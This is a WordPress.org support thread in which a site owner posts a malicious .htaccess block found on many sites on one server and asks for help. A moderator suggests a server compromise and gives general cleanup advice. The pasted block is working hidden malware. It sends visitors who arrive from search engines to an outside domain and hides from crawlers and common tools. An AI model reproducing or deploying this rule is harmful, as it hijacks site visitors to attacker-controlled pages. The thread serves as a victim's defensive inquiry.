WordPress.org

1. welshhuw
   Member
   Posted 2 years ago #
   

   Hi,

   I have been finding some .htaccess files containg the following within my wordpress installation. Also, we have another 20ish sites on the same server, and the files have appeared there too. (These sites are html/css sites run on our custom cms)

   RewriteEngine On
   RewriteCond %{REQUEST_METHOD} ^GET$
   RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
   RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
   RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
   RewriteCond %{HTTPS} ^off$
   RewriteRule ^(.*)$ http://protechere.com/cgi-bin/r.cgi?p=10003&i=aab066bc&j=310&m=708aa72730768a8e4702c023017cccd9&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
   # exgocgkctswo

   I have been deleting the infected files but can someone help me shed some light on what it is and how it got there! My server guys are saying it something to do with a WP plugin?

   Thanks

2. Ipstenu (Mika Epstein)
   Half-Elf Support Rogue & Mod
   Posted 2 years ago #
   

   Well ... what plugins are you running?

   It looks more like a server hack to me, but it could be a bad plugin, so start by disabling and deleting the ones you don't need AND changing your server and wordpress passwords. Just in case.

3. welshhuw
   Member
   Posted 2 years ago #
   

   Hi,

   Thanks for your reply. Here is the list of plugins I have running. Over about 5 WP installations.

   Akismet
   All In One Seo Pack
   Google XML Sitemaps
   wp Smush.it
   Automatic SEO links
   cForms
   Featured Content Gallery
   Super Image Plugin
   Video Widget
   WP Security Scan
   FeedWordpress
   TDO Mini Forms

   I have deleted and disable the ones I wasnt using and didnt need.

   Any advice on where this could've come from would be grateful!!

   Thanks again.

4. Ipstenu (Mika Epstein)
   Half-Elf Support Rogue & Mod
   Posted 2 years ago #
   

   None of those should be causing this behavior.

   Read this: http://codex.wordpress.org/FAQ_My_site_was_hacked

   Your server may be under attack.

5. welshhuw
   Member
   Posted 2 years ago #
   

   Thanks but the server guys are abs. positive its due to plugins...!?

   Have deleted all infected files and checked all plugins are up to date.

6. Ipstenu (Mika Epstein)
   Half-Elf Support Rogue & Mod
   Posted 2 years ago #
   

   Yeah, a lot of the times server guys are 100% sure it's plugins. Generally it's not. I mean, yes, SOME plugins are made by hackers, but it's more common that a botched plugin install leaves your server insecure, which opens you to server hacks. And even more common than THAT is a server insecure on a level you, as a user, cannot fix, and your host must.

   Change your server password, your database password, and your blog passwords.

   Check the folder/file permissions on your account. Do the best you can.

7. welshhuw
   Member
   Posted 2 years ago #
   

   Did all of the above and now its back!!

   But what I can figure out is that the infected files have a later date than when I cleaned them all out???

   I know I would have deleted/cleaned them out so is it possible for them to 'back-date' the infected files?

Topic Closed

This topic has been closed to new replies.